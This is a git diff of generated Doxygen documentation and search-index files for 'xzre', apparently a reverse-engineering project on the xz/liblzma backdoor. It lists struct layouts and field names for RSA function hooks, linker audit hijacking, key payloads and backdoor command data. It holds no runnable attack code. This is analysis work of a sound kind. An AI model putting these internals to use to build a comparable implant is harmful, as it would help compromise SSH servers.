['dynamic_5flinker_5fmap_459',['dynamic_linker_map',['../structbackdoor__data.html#af0c12a5d305514c457e8ccd17a9634d1',1,'backdoor_data']]] ]; diff --git a/search/variables_4.js b/search/variables_4.js index ccf87b4..49ffa7f 100644 --- a/search/variables_4.js +++ b/search/variables_4.js @@ -1,11 +1,11 @@ var searchData= [ - ['e_5fphnum_455',['e_phnum',['../structelf__info.html#a58ce2573274e2ad8e97b839ed3e17e3e',1,'elf_info']]], - ['elf_5ffunctions_456',['elf_functions',['../xzre_8h.html#a43a1216740525fdfa050474fc9b91a57',1,'xzre.h']]], - ['elf_5ffunctions_5foffset_457',['elf_functions_offset',['../xzre_8h.html#a4623e8d4254091bcbffbead1ee7ed2ff',1,'xzre.h']]], - ['elf_5fparse_458',['elf_parse',['../structelf__functions.html#aa14d9c82c4eb98b3da13538201353533',1,'elf_functions']]], - ['elf_5fsymbol_5fget_5faddr_459',['elf_symbol_get_addr',['../structelf__functions.html#a63dc1dc013c89cb5a59868f5b90f736b',1,'elf_functions']]], - ['elfbase_460',['elfbase',['../structelf__info.html#a583c4dd181c2f8b831e56c0d12acd660',1,'elf_info']]], - ['end_5faddr_461',['end_addr',['../structinstruction__search__ctx.html#a84ab74900d4eddc764c11910a7d1bae5',1,'instruction_search_ctx']]], - ['evp_5fpkey_5fset1_5frsa_5fplt_462',['EVP_PKEY_set1_RSA_plt',['../structimported__funcs.html#af95a28ca3f6c25bd3ecdd064a23309c5',1,'imported_funcs::EVP_PKEY_set1_RSA_plt()'],['../structbackdoor__shared__libraries__data.html#a875496a16e72c0cb3d8da33781762e0f',1,'backdoor_shared_libraries_data::EVP_PKEY_set1_RSA_plt()']]] + ['e_5fphnum_460',['e_phnum',['../structelf__info.html#a58ce2573274e2ad8e97b839ed3e17e3e',1,'elf_info']]], + ['elf_5ffunctions_461',['elf_functions',['../xzre_8h.html#a43a1216740525fdfa050474fc9b91a57',1,'xzre.h']]], + ['elf_5ffunctions_5foffset_462',['elf_functions_offset',['../xzre_8h.html#a4623e8d4254091bcbffbead1ee7ed2ff',1,'xzre.h']]], + ['elf_5fparse_463',['elf_parse',['../structelf__functions.html#aa14d9c82c4eb98b3da13538201353533',1,'elf_functions']]], + ['elf_5fsymbol_5fget_5faddr_464',['elf_symbol_get_addr',['../structelf__functions.html#a63dc1dc013c89cb5a59868f5b90f736b',1,'elf_functions']]], + ['elfbase_465',['elfbase',['../structelf__info.html#a583c4dd181c2f8b831e56c0d12acd660',1,'elf_info']]], + ['end_5faddr_466',['end_addr',['../structinstruction__search__ctx.html#a84ab74900d4eddc764c11910a7d1bae5',1,'instruction_search_ctx']]], + ['evp_5fpkey_5fset1_5frsa_5fplt_467',['EVP_PKEY_set1_RSA_plt',['../structimported__funcs.html#af95a28ca3f6c25bd3ecdd064a23309c5',1,'imported_funcs::EVP_PKEY_set1_RSA_plt()'],['../structbackdoor__shared__libraries__data.html#a875496a16e72c0cb3d8da33781762e0f',1,'backdoor_shared_libraries_data::EVP_PKEY_set1_RSA_plt()']]] ]; diff --git a/search/variables_5.js b/search/variables_5.js index f7da735..151529c 100644 --- a/search/variables_5.js +++ b/search/variables_5.js @@ -1,11 +1,11 @@ var searchData= [ - ['fake_5flzma_5fallocator_463',['fake_lzma_allocator',['../xzre_8h.html#a654fa519cae913e8f1b0c5ad54f8cc3a',1,'xzre.h']]], - ['fake_5flzma_5fallocator_5foffset_464',['fake_lzma_allocator_offset',['../xzre_8h.html#aaab5bc3cf0e40bb0aa5bc72a3fd05fbe',1,'xzre.h']]], - ['first_5fvaddr_465',['first_vaddr',['../structelf__info.html#a04ca46ae688dfda82b39e720268a4316',1,'elf_info']]], - ['flags_466',['flags',['../structdasm__ctx.html#a796e3a14f3891989329c1f9ec42ad52d',1,'dasm_ctx']]], - ['flags2_467',['flags2',['../structdasm__ctx.html#a5b50323e1c764a1d56b2e23420700435',1,'dasm_ctx']]], - ['frame_5faddress_468',['frame_address',['../structelf__entry__ctx.html#ae94828a49d53defaf1aadedfbd3da2f2',1,'elf_entry_ctx']]], - ['func_5fend_469',['func_end',['../structstring__item.html#ae6cce2ab7682458ebe28410ba3e7b365',1,'string_item']]], - ['func_5fstart_470',['func_start',['../structstring__item.html#a49946c1b866caf7cae72a07271dbbf89',1,'string_item']]] + ['fake_5flzma_5fallocator_468',['fake_lzma_allocator',['../xzre_8h.html#a654fa519cae913e8f1b0c5ad54f8cc3a',1,'xzre.h']]], + ['fake_5flzma_5fallocator_5foffset_469',['fake_lzma_allocator_offset',['../xzre_8h.html#aaab5bc3cf0e40bb0aa5bc72a3fd05fbe',1,'xzre.h']]], + ['first_5fvaddr_470',['first_vaddr',['../structelf__info.html#a04ca46ae688dfda82b39e720268a4316',1,'elf_info']]], + ['flags_471',['flags',['../structdasm__ctx.html#a796e3a14f3891989329c1f9ec42ad52d',1,'dasm_ctx']]], + ['flags2_472',['flags2',['../structdasm__ctx.html#a5b50323e1c764a1d56b2e23420700435',1,'dasm_ctx']]], + ['frame_5faddress_473',['frame_address',['../structelf__entry__ctx.html#ae94828a49d53defaf1aadedfbd3da2f2',1,'elf_entry_ctx']]], + ['func_5fend_474',['func_end',['../structstring__item.html#ae6cce2ab7682458ebe28410ba3e7b365',1,'string_item']]], + ['func_5fstart_475',['func_start',['../structstring__item.html#a49946c1b866caf7cae72a07271dbbf89',1,'string_item']]] ]; diff --git a/search/variables_6.js b/search/variables_6.js index 1a4d770..c7c8fe2 100644 --- a/search/variables_6.js +++ b/search/variables_6.js @@ -1,10 +1,10 @@ var searchData= [ - ['gnu_5fhash_5flast_5fbloom_471',['gnu_hash_last_bloom',['../structelf__info.html#a3a1a5acb2d22a9bc1ae2df30fa121a33',1,'elf_info']]], - ['gnu_5fhash_5fnbuckets_472',['gnu_hash_nbuckets',['../structelf__info.html#a575df843cb133e2a75e6b8027eb75659',1,'elf_info']]], - ['gnurelro_5ffound_473',['gnurelro_found',['../structelf__info.html#a66d75bbde3aa44519fd136a848e051da',1,'elf_info']]], - ['gnurelro_5fmemsize_474',['gnurelro_memsize',['../structelf__info.html#a1783b21f972415e71d5cb7d8531de5e5',1,'elf_info']]], - ['gnurelro_5fvaddr_475',['gnurelro_vaddr',['../structelf__info.html#a8500b4de03a9b9d44989375921b27f70',1,'elf_info']]], - ['got_5foffset_476',['got_offset',['../structgot__ctx.html#afc55b6f8c228b93eb08d1bdc061f4750',1,'got_ctx']]], - ['got_5fptr_477',['got_ptr',['../structgot__ctx.html#aac8a1b7398f74099e686177ae0a11a9b',1,'got_ctx']]] + ['gnu_5fhash_5flast_5fbloom_476',['gnu_hash_last_bloom',['../structelf__info.html#a3a1a5acb2d22a9bc1ae2df30fa121a33',1,'elf_info']]], + ['gnu_5fhash_5fnbuckets_477',['gnu_hash_nbuckets',['../structelf__info.html#a575df843cb133e2a75e6b8027eb75659',1,'elf_info']]], + ['gnurelro_5ffound_478',['gnurelro_found',['../structelf__info.html#a66d75bbde3aa44519fd136a848e051da',1,'elf_info']]], + ['gnurelro_5fmemsize_479',['gnurelro_memsize',['../structelf__info.html#a1783b21f972415e71d5cb7d8531de5e5',1,'elf_info']]], + ['gnurelro_5fvaddr_480',['gnurelro_vaddr',['../structelf__info.html#a8500b4de03a9b9d44989375921b27f70',1,'elf_info']]], + ['got_5foffset_481',['got_offset',['../structgot__ctx.html#afc55b6f8c228b93eb08d1bdc061f4750',1,'got_ctx']]], + ['got_5fptr_482',['got_ptr',['../structgot__ctx.html#aac8a1b7398f74099e686177ae0a11a9b',1,'got_ctx']]] ]; diff --git a/search/variables_7.js b/search/variables_7.js index 253fb05..ba6e60b 100644 --- a/search/variables_7.js +++ b/search/variables_7.js @@ -1,8 +1,8 @@ var searchData= [ - ['hook_5fevp_5fpkey_5fset1_5frsa_478',['hook_EVP_PKEY_set1_RSA',['../structbackdoor__shared__globals.html#a2b3e66d0fba425140c3a66cb4730d2a5',1,'backdoor_shared_globals::hook_EVP_PKEY_set1_RSA()'],['../structldso__ctx.html#abe3b0f470ffff74817c67770f4a804f1',1,'ldso_ctx::hook_EVP_PKEY_set1_RSA()']]], - ['hook_5frsa_5fget0_5fkey_479',['hook_RSA_get0_key',['../structldso__ctx.html#a6ebdde768535a27a9a269f5f5b5f9cb2',1,'ldso_ctx']]], - ['hook_5frsa_5fpublic_5fdecrypt_480',['hook_RSA_public_decrypt',['../structldso__ctx.html#ae2d0c91c19ed327dc332e5a42778e9a3',1,'ldso_ctx']]], - ['hooked_5faudit_5fifaces_481',['hooked_audit_ifaces',['../structldso__ctx.html#a91f73403c7858ed838d4d16148296485',1,'ldso_ctx']]], - ['hooks_5fdata_5faddr_482',['hooks_data_addr',['../xzre_8h.html#a32c97a88bc607d3f2459f0d7d420099d',1,'xzre.h']]] + ['hook_5fevp_5fpkey_5fset1_5frsa_483',['hook_EVP_PKEY_set1_RSA',['../structbackdoor__shared__globals.html#a2b3e66d0fba425140c3a66cb4730d2a5',1,'backdoor_shared_globals::hook_EVP_PKEY_set1_RSA()'],['../structldso__ctx.html#abe3b0f470ffff74817c67770f4a804f1',1,'ldso_ctx::hook_EVP_PKEY_set1_RSA()']]], + ['hook_5frsa_5fget0_5fkey_484',['hook_RSA_get0_key',['../structldso__ctx.html#a6ebdde768535a27a9a269f5f5b5f9cb2',1,'ldso_ctx']]], + ['hook_5frsa_5fpublic_5fdecrypt_485',['hook_RSA_public_decrypt',['../structldso__ctx.html#ae2d0c91c19ed327dc332e5a42778e9a3',1,'ldso_ctx']]], + ['hooked_5faudit_5fifaces_486',['hooked_audit_ifaces',['../structldso__ctx.html#a91f73403c7858ed838d4d16148296485',1,'ldso_ctx']]], + ['hooks_5fdata_5faddr_487',['hooks_data_addr',['../xzre_8h.html#a32c97a88bc607d3f2459f0d7d420099d',1,'xzre.h']]] ]; diff --git a/search/variables_8.js b/search/variables_8.js index 762634d..7f4e54c 100644 --- a/search/variables_8.js +++ b/search/variables_8.js @@ -1,7 +1,7 @@ var searchData= [ - ['import_5fresolver_483',['import_resolver',['../structbackdoor__data.html#ad6eb45526286b7304fb01af7c50ff5b2',1,'backdoor_data']]], - ['imported_5ffuncs_484',['imported_funcs',['../structglobal__context.html#a5dccd92d1dd861220b290896bd7ba487',1,'global_context']]], - ['index_485',['index',['../unionsecret__data__shift__cursor__t.html#a159dd83929f3c1d7b994d4961d8f7850',1,'secret_data_shift_cursor_t']]], - ['init_5fhook_5ffunctions_486',['init_hook_functions',['../structelf__functions.html#a4034b3706679dac6eacec8f90530d652',1,'elf_functions']]] + ['import_5fresolver_488',['import_resolver',['../structbackdoor__data.html#ad6eb45526286b7304fb01af7c50ff5b2',1,'backdoor_data']]], + ['imported_5ffuncs_489',['imported_funcs',['../structglobal__context.html#a5dccd92d1dd861220b290896bd7ba487',1,'global_context']]], + ['index_490',['index',['../unionsecret__data__shift__cursor__t.html#a159dd83929f3c1d7b994d4961d8f7850',1,'secret_data_shift_cursor_t']]], + ['init_5fhook_5ffunctions_491',['init_hook_functions',['../structelf__functions.html#a4034b3706679dac6eacec8f90530d652',1,'elf_functions']]] ]; diff --git a/search/variables_9.js b/search/variables_9.js index eb966a4..7d67559 100644 --- a/search/variables_9.js +++ b/search/variables_9.js @@ -1,12 +1,12 @@ var searchData= [ - ['libc_5fimports_487',['libc_imports',['../structglobal__context.html#a2f75270d895fb7a930c5286c6f929e28',1,'global_context::libc_imports()'],['../structbackdoor__data.html#a116ff042f4a1a315724cc6f65a56e359',1,'backdoor_data::libc_imports()']]], - ['libc_5finfo_488',['libc_info',['../structbackdoor__data.html#a8926fe3d847696a0a1b58ec7e9c6d14e',1,'backdoor_data']]], - ['libcrypto_5fauditstate_5fbindflags_5fold_5fvalue_489',['libcrypto_auditstate_bindflags_old_value',['../structldso__ctx.html#a1ed972f5c9306a268f94ccf5b84b911c',1,'ldso_ctx']]], - ['libcrypto_5fauditstate_5fbindflags_5fptr_490',['libcrypto_auditstate_bindflags_ptr',['../structldso__ctx.html#a4af16654f389b0bf2bd96308afd1d469',1,'ldso_ctx']]], - ['libcrypto_5finfo_491',['libcrypto_info',['../structbackdoor__data.html#a932329dfc876e64f123c922e55b30142',1,'backdoor_data']]], - ['libcrypto_5fl_5fname_492',['libcrypto_l_name',['../structldso__ctx.html#a8f68b96010a76e72135e68cfad110542',1,'ldso_ctx']]], - ['link_5fmap_5fl_5faudit_5fany_5fplt_5fbitmask_493',['link_map_l_audit_any_plt_bitmask',['../structldso__ctx.html#a5f52e1a88c3a17d61072f2d944f706e7',1,'ldso_ctx']]], - ['lzma_5fcode_5fend_494',['lzma_code_end',['../structglobal__context.html#a031805daad5b0f7f951ef58614533588',1,'global_context']]], - ['lzma_5fcode_5fstart_495',['lzma_code_start',['../structglobal__context.html#acf13081708c1c8ca5b3902d198419bd1',1,'global_context']]] + ['libc_5fimports_492',['libc_imports',['../structglobal__context.html#a2f75270d895fb7a930c5286c6f929e28',1,'global_context::libc_imports()'],['../structbackdoor__data.html#a116ff042f4a1a315724cc6f65a56e359',1,'backdoor_data::libc_imports()']]], + ['libc_5finfo_493',['libc_info',['../structbackdoor__data.html#a8926fe3d847696a0a1b58ec7e9c6d14e',1,'backdoor_data']]], + ['libcrypto_5fauditstate_5fbindflags_5fold_5fvalue_494',['libcrypto_auditstate_bindflags_old_value',['../structldso__ctx.html#a1ed972f5c9306a268f94ccf5b84b911c',1,'ldso_ctx']]], + ['libcrypto_5fauditstate_5fbindflags_5fptr_495',['libcrypto_auditstate_bindflags_ptr',['../structldso__ctx.html#a4af16654f389b0bf2bd96308afd1d469',1,'ldso_ctx']]], + ['libcrypto_5finfo_496',['libcrypto_info',['../structbackdoor__data.html#a932329dfc876e64f123c922e55b30142',1,'backdoor_data']]], + ['libcrypto_5fl_5fname_497',['libcrypto_l_name',['../structldso__ctx.html#a8f68b96010a76e72135e68cfad110542',1,'ldso_ctx']]], + ['link_5fmap_5fl_5faudit_5fany_5fplt_5fbitmask_498',['link_map_l_audit_any_plt_bitmask',['../structldso__ctx.html#a5f52e1a88c3a17d61072f2d944f706e7',1,'ldso_ctx']]], + ['lzma_5fcode_5fend_499',['lzma_code_end',['../structglobal__context.html#a031805daad5b0f7f951ef58614533588',1,'global_context']]], + ['lzma_5fcode_5fstart_500',['lzma_code_start',['../structglobal__context.html#acf13081708c1c8ca5b3902d198419bd1',1,'global_context']]] ]; diff --git a/search/variables_a.js b/search/variables_a.js index cdfc3e0..921a090 100644 --- a/search/variables_a.js +++ b/search/variables_a.js @@ -1,6 +1,6 @@ var searchData= [ - ['main_496',['main',['../structelf__handles.html#ad693d428a831ddaadae6d8de369ebf80',1,'elf_handles']]], - ['main_5finfo_497',['main_info',['../structbackdoor__data.html#ad66782fe22d1981edf9f791ac0d4a0d7',1,'backdoor_data']]], - ['main_5fmap_498',['main_map',['../structbackdoor__data.html#a6d36460b86405888db4138fb6cb02a21',1,'backdoor_data']]] + ['main_501',['main',['../structelf__handles.html#ad693d428a831ddaadae6d8de369ebf80',1,'elf_handles']]], + ['main_5finfo_502',['main_info',['../structbackdoor__data.html#ad66782fe22d1981edf9f791ac0d4a0d7',1,'backdoor_data']]], + ['main_5fmap_503',['main_map',['../structbackdoor__data.html#a6d36460b86405888db4138fb6cb02a21',1,'backdoor_data']]] ]; diff --git a/search/variables_b.js b/search/variables_b.js index 70a2914..6d9f49d 100644 --- a/search/variables_b.js +++ b/search/variables_b.js @@ -1,4 +1,4 @@ var searchData= [ - ['num_5fshifted_5fbits_499',['num_shifted_bits',['../structglobal__context.html#a6895ac8df8ead90c8f140a8c6606828f',1,'global_context']]] + ['num_5fshifted_5fbits_504',['num_shifted_bits',['../structglobal__context.html#a6895ac8df8ead90c8f140a8c6606828f',1,'global_context']]] ]; diff --git a/search/variables_c.js b/search/variables_c.js index a9139e4..408b89a 100644 --- a/search/variables_c.js +++ b/search/variables_c.js @@ -1,5 +1,5 @@ var searchData= [ - ['offset_5fto_5fmatch_500',['offset_to_match',['../structinstruction__search__ctx.html#a68e8f8c7f105fcfe3bc77abbfcdb493e',1,'instruction_search_ctx']]], - ['output_5fregister_5fto_5fmatch_501',['output_register_to_match',['../structinstruction__search__ctx.html#ae0ec8bee47bf045c3ce653c33b9ce2f1',1,'instruction_search_ctx']]] + ['offset_5fto_5fmatch_505',['offset_to_match',['../structinstruction__search__ctx.html#a68e8f8c7f105fcfe3bc77abbfcdb493e',1,'instruction_search_ctx']]], + ['output_5fregister_5fto_5fmatch_506',['output_register_to_match',['../structinstruction__search__ctx.html#ae0ec8bee47bf045c3ce653c33b9ce2f1',1,'instruction_search_ctx']]] ]; diff --git a/search/variables_d.js b/search/variables_d.js index f7e1f4c..8e28255 100644 --- a/search/variables_d.js +++ b/search/variables_d.js @@ -1,6 +1,6 @@ var searchData= [ - ['phdrs_502',['phdrs',['../structelf__info.html#a46b6bb90c2dccef9e76c09ea014048ae',1,'elf_info']]], - ['plt_5frelocs_503',['plt_relocs',['../structelf__info.html#a5d272c3d46d0b9254b9ba62ad38ef2b5',1,'elf_info']]], - ['plt_5frelocs_5fnum_504',['plt_relocs_num',['../structelf__info.html#ad4c0ec1374213c0f36d73ddcb3bbfd08',1,'elf_info']]] + ['phdrs_507',['phdrs',['../structelf__info.html#a46b6bb90c2dccef9e76c09ea014048ae',1,'elf_info']]], + ['plt_5frelocs_508',['plt_relocs',['../structelf__info.html#a5d272c3d46d0b9254b9ba62ad38ef2b5',1,'elf_info']]], + ['plt_5frelocs_5fnum_509',['plt_relocs_num',['../structelf__info.html#ad4c0ec1374213c0f36d73ddcb3bbfd08',1,'elf_info']]] ]; diff --git a/search/variables_e.js b/search/variables_e.js index e45ccac..9e70942 100644 --- a/search/variables_e.js +++ b/search/variables_e.js @@ -1,8 +1,8 @@ var searchData= [ - ['resolver_5fcall_5fcount_505',['resolver_call_count',['../xzre_8h.html#ab9c7b9765c15a48fbed3d1a8daf1b27f',1,'xzre.h']]], - ['result_506',['result',['../structinstruction__search__ctx.html#a05e5f377f835a8081b52dc6d331c81fb',1,'instruction_search_ctx']]], - ['return_5faddress_507',['return_address',['../structgot__ctx.html#a09bcbc0f40125bda4b3c461c71085d2c',1,'got_ctx']]], - ['rsa_5fget0_5fkey_5fplt_508',['RSA_get0_key_plt',['../structimported__funcs.html#a52a65738a6de9458c8952bd142331191',1,'imported_funcs::RSA_get0_key_plt()'],['../structbackdoor__shared__libraries__data.html#a89e6b89c81556fab72e027d1b7e44a8b',1,'backdoor_shared_libraries_data::RSA_get0_key_plt()']]], - ['rsa_5fpublic_5fdecrypt_5fplt_509',['RSA_public_decrypt_plt',['../structimported__funcs.html#a37ed0762785dde90622e25985c9abc35',1,'imported_funcs::RSA_public_decrypt_plt()'],['../structbackdoor__shared__libraries__data.html#aaee59a1ccd7efcb2615d4cec198a5bb6',1,'backdoor_shared_libraries_data::RSA_public_decrypt_plt()']]] + ['resolver_5fcall_5fcount_510',['resolver_call_count',['../xzre_8h.html#ab9c7b9765c15a48fbed3d1a8daf1b27f',1,'xzre.h']]], + ['result_511',['result',['../structinstruction__search__ctx.html#a05e5f377f835a8081b52dc6d331c81fb',1,'instruction_search_ctx']]], + ['return_5faddress_512',['return_address',['../structgot__ctx.html#a09bcbc0f40125bda4b3c461c71085d2c',1,'got_ctx']]], + ['rsa_5fget0_5fkey_5fplt_513',['RSA_get0_key_plt',['../structimported__funcs.html#a52a65738a6de9458c8952bd142331191',1,'imported_funcs::RSA_get0_key_plt()'],['../structbackdoor__shared__libraries__data.html#a89e6b89c81556fab72e027d1b7e44a8b',1,'backdoor_shared_libraries_data::RSA_get0_key_plt()']]], + ['rsa_5fpublic_5fdecrypt_5fplt_514',['RSA_public_decrypt_plt',['../structimported__funcs.html#a37ed0762785dde90622e25985c9abc35',1,'imported_funcs::RSA_public_decrypt_plt()'],['../structbackdoor__shared__libraries__data.html#aaee59a1ccd7efcb2615d4cec198a5bb6',1,'backdoor_shared_libraries_data::RSA_public_decrypt_plt()']]] ]; diff --git a/search/variables_f.js b/search/variables_f.js index 2473161..7eb63ea 100644 --- a/search/variables_f.js +++ b/search/variables_f.js @@ -1,25 +1,25 @@ var searchData= [ - ['secret_5fdata_510',['secret_data',['../structglobal__context.html#a2e2c677442b432af30edeb9263a8a5ab',1,'global_context']]], - ['shift_5foperations_511',['shift_operations',['../structglobal__context.html#a6f197e9f7782db222c1a54ed0f59fd58',1,'global_context']]], - ['signature_512',['signature',['../structkey__payload__body.html#a97e29f6eef1a4def27c0345ee963b4c1',1,'key_payload_body']]], - ['size_513',['size',['../structlzma__sha256__state.html#a62337a1a0d34a9702ab4a438da383794',1,'lzma_sha256_state']]], - ['sshd_5fauditstate_5fbindflags_5fold_5fvalue_514',['sshd_auditstate_bindflags_old_value',['../structldso__ctx.html#a7cc8b9818d079073b25c93e55f3776eb',1,'ldso_ctx']]], - ['sshd_5fauditstate_5fbindflags_5fptr_515',['sshd_auditstate_bindflags_ptr',['../structldso__ctx.html#a136f1f2760b5d9eb601fc599b84c8fd8',1,'ldso_ctx']]], - ['sshd_5fcode_5fend_516',['sshd_code_end',['../structglobal__context.html#a8ddd06f420ebcea88a17df57aca07714',1,'global_context']]], - ['sshd_5fcode_5fstart_517',['sshd_code_start',['../structglobal__context.html#a6b0e7c4ac8682de374b956ee137a22d8',1,'global_context']]], - ['sshd_5fdata_5fend_518',['sshd_data_end',['../structglobal__context.html#a6c7245e596313f01e7411aecdda645df',1,'global_context']]], - ['sshd_5fdata_5fstart_519',['sshd_data_start',['../structglobal__context.html#a5f6a9e31db48c18d66d7cac9f2992393',1,'global_context']]], - ['sshd_5flink_5fmap_5fl_5faudit_5fany_5fplt_5faddr_520',['sshd_link_map_l_audit_any_plt_addr',['../structldso__ctx.html#ae3a49e232656fb95fbb2f3f08f579639',1,'ldso_ctx']]], - ['start_5faddr_521',['start_addr',['../structinstruction__search__ctx.html#a80df4d55c53d2716bed1a419bcbd9c7c',1,'instruction_search_ctx']]], - ['state_522',['state',['../structlzma__sha256__state.html#adb885aab736aae3772761f6c663c40be',1,'lzma_sha256_state::state()'],['../structlzma__check__state.html#ae327393eade6156b7f89a25da3c985a5',1,'lzma_check_state::state()']]], - ['str_5frsa_5fsha2_5f256_523',['STR_rsa_sha2_256',['../structglobal__context.html#a825b99a7c594e756f18c6278286f4a3e',1,'global_context']]], - ['str_5fssh_5frsa_5fcert_5fv01_5fopenssh_5fcom_524',['STR_ssh_rsa_cert_v01_openssh_com',['../structglobal__context.html#a3f9434a1f400536662da98291b5b82b2',1,'global_context']]], - ['string_5faction_5fdata_525',['string_action_data',['../xzre_8h.html#a53450f0faa9d81b24f8cee5731b51a58',1,'xzre.h']]], - ['string_5fid_526',['string_id',['../structstring__item.html#a7127d6c46cccb4d81759f01f495acd9f',1,'string_item']]], - ['string_5fmask_5fdata_527',['string_mask_data',['../xzre_8h.html#a8c67ac851c8ec7f40c406b286233f98e',1,'xzre.h']]], - ['string_5frefs_528',['string_refs',['../structbackdoor__data.html#a374102b786779a01463a82162ac97614',1,'backdoor_data']]], - ['strtab_529',['strtab',['../structelf__info.html#a4234e0dcece021d3bb5d64723180da9a',1,'elf_info']]], - ['symbol_5fptr_530',['symbol_ptr',['../structelf__entry__ctx.html#a286882a4d56155f97674460abe66b9cb',1,'elf_entry_ctx']]], - ['symtab_531',['symtab',['../structelf__info.html#aa34e0002d511de06b931d7c7b7579dc0',1,'elf_info']]] + ['secret_5fdata_515',['secret_data',['../structglobal__context.html#a2e2c677442b432af30edeb9263a8a5ab',1,'global_context']]], + ['shift_5foperations_516',['shift_operations',['../structglobal__context.html#a6f197e9f7782db222c1a54ed0f59fd58',1,'global_context']]], + ['signature_517',['signature',['../structkey__payload__body.html#a486992728c3e03265c4006718106cd37',1,'key_payload_body']]], + ['size_518',['size',['../structlzma__sha256__state.html#a62337a1a0d34a9702ab4a438da383794',1,'lzma_sha256_state']]], + ['sshd_5fauditstate_5fbindflags_5fold_5fvalue_519',['sshd_auditstate_bindflags_old_value',['../structldso__ctx.html#a7cc8b9818d079073b25c93e55f3776eb',1,'ldso_ctx']]], + ['sshd_5fauditstate_5fbindflags_5fptr_520',['sshd_auditstate_bindflags_ptr',['../structldso__ctx.html#a136f1f2760b5d9eb601fc599b84c8fd8',1,'ldso_ctx']]], + ['sshd_5fcode_5fend_521',['sshd_code_end',['../structglobal__context.html#a8ddd06f420ebcea88a17df57aca07714',1,'global_context']]], + ['sshd_5fcode_5fstart_522',['sshd_code_start',['../structglobal__context.html#a6b0e7c4ac8682de374b956ee137a22d8',1,'global_context']]], + ['sshd_5fdata_5fend_523',['sshd_data_end',['../structglobal__context.html#a6c7245e596313f01e7411aecdda645df',1,'global_context']]], + ['sshd_5fdata_5fstart_524',['sshd_data_start',['../structglobal__context.html#a5f6a9e31db48c18d66d7cac9f2992393',1,'global_context']]], + ['sshd_5flink_5fmap_5fl_5faudit_5fany_5fplt_5faddr_525',['sshd_link_map_l_audit_any_plt_addr',['../structldso__ctx.html#ae3a49e232656fb95fbb2f3f08f579639',1,'ldso_ctx']]], + ['start_5faddr_526',['start_addr',['../structinstruction__search__ctx.html#a80df4d55c53d2716bed1a419bcbd9c7c',1,'instruction_search_ctx']]], + ['state_527',['state',['../structlzma__sha256__state.html#adb885aab736aae3772761f6c663c40be',1,'lzma_sha256_state::state()'],['../structlzma__check__state.html#ae327393eade6156b7f89a25da3c985a5',1,'lzma_check_state::state()']]], + ['str_5frsa_5fsha2_5f256_528',['STR_rsa_sha2_256',['../structglobal__context.html#a825b99a7c594e756f18c6278286f4a3e',1,'global_context']]], + ['str_5fssh_5frsa_5fcert_5fv01_5fopenssh_5fcom_529',['STR_ssh_rsa_cert_v01_openssh_com',['../structglobal__context.html#a3f9434a1f400536662da98291b5b82b2',1,'global_context']]], + ['string_5faction_5fdata_530',['string_action_data',['../xzre_8h.html#a53450f0faa9d81b24f8cee5731b51a58',1,'xzre.h']]], + ['string_5fid_531',['string_id',['../structstring__item.html#a7127d6c46cccb4d81759f01f495acd9f',1,'string_item']]], + ['string_5fmask_5fdata_532',['string_mask_data',['../xzre_8h.html#a8c67ac851c8ec7f40c406b286233f98e',1,'xzre.h']]], + ['string_5frefs_533',['string_refs',['../structbackdoor__data.html#a374102b786779a01463a82162ac97614',1,'backdoor_data']]], + ['strtab_534',['strtab',['../structelf__info.html#a4234e0dcece021d3bb5d64723180da9a',1,'elf_info']]], + ['symbol_5fptr_535',['symbol_ptr',['../structelf__entry__ctx.html#a286882a4d56155f97674460abe66b9cb',1,'elf_entry_ctx']]], + ['symtab_536',['symtab',['../structelf__info.html#aa34e0002d511de06b931d7c7b7579dc0',1,'elf_info']]] ]; diff --git a/structkey__ctx.html b/structkey__ctx.html index f89f38f..50e2c8a 100644 --- a/structkey__ctx.html +++ b/structkey__ctx.html @@ -71,34 +71,33 @@ - - - - + +

Public Member Functions

PADDING (0x30)
 
PADDING (sizeof(key_payload_hdr_t))
 
PADDING (CHACHA20_KEY_SIZE+CHACHA20_IV_SIZE)
 
 PADDING (2)
 
- - - - + + + + - - - + + + +

Data Fields

-BIGNUM * rsa_n
 
-BIGNUM * rsa_e
 
+const BIGNUM * rsa_n
 
+const BIGNUM * rsa_e
 
cmd_arguments_t args
 
key_payload_t payload
 
-u8 decrypted_secret_data [57]
 ChaCha Key.
 
+u8 ivec [CHACHA20_IV_SIZE]
 
+u8 ed448_key [ED448_KEY_SIZE]
 
The documentation for this struct was generated from the following file:
+ +

data used within sshd_proxy_elevate + More...

+ +

#include <xzre.h>

- - - + - +

Public Member Functions

+
 PADDING (4)
 
+
 
 PADDING (6)
 
 
- - - + - - + - - + - - + - - + - - + - +

Data Fields

+
u32 cmd_type
 
+
 
cmd_arguments_targs
 
+
 
const BIGNUM * rsa_n
 
+
 
const BIGNUM * rsa_e
 
+
 
u8 * payload_body
 
+
 
u16 payload_body_size
 
+
 
RSA * rsa
 
 
-
The documentation for this struct was generated from the following file:
diff --git a/structrun__backdoor__commands__data.html b/structrun__backdoor__commands__data.html new file mode 100644 index 0000000..2345316 --- /dev/null +++ b/structrun__backdoor__commands__data.html @@ -0,0 +1,148 @@ + + + + + + + +xzre: run_backdoor_commands_data Struct Reference + + + + + + + + + +
+
+ + + + + + +
+
xzre +
+
+
+ + + + + + + + +
+
+ + +
+ +
+ +
+
+
+Public Member Functions | +Data Fields
+
+
run_backdoor_commands_data Struct Reference
+
+
+ +

stack frame layout for run_backdoor_commands + More...

+ +

#include <xzre.h>

+ + + + + + + + + + +

+Public Member Functions

PADDING (8)
 
PADDING (4)
 
PADDING (8)
 
PADDING (7)
 
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + +

+Data Fields

+u64 body_size
 
+u32 * p_do_orig
 
+u64 payload_size
 
+u64 hostkey_hash_offset
 
+RSA * rsa
 
+u8 * ed448_key_ptr
 
+u64 num_keys
 
+u32 key_cur_idx
 
+u64 key_prev_idx
 
+u64 num_host_keys
 
+u64 num_host_pubkeys
 
+u8 ed448_key [ED448_KEY_SIZE]
 
+payload_t payload
 
+key_ctx_t kctx
 
+

Detailed Description

+

stack frame layout for run_backdoor_commands

+
The documentation for this struct was generated from the following file: +
+ +
+Generated by doxygen 1.9.1 +
+ + diff --git a/structsshd__log__ctx.html b/structsshd__log__ctx.html index 56b0317..be1edf2 100644 --- a/structsshd__log__ctx.html +++ b/structsshd__log__ctx.html @@ -71,12 +71,12 @@ - - - - + + + + @@ -92,6 +92,12 @@

Public Member Functions

PADDING (0x8)
 
PADDING (0x8)
 
PADDING (4)
 
PADDING (4)
 
 PADDING (0x8)
 
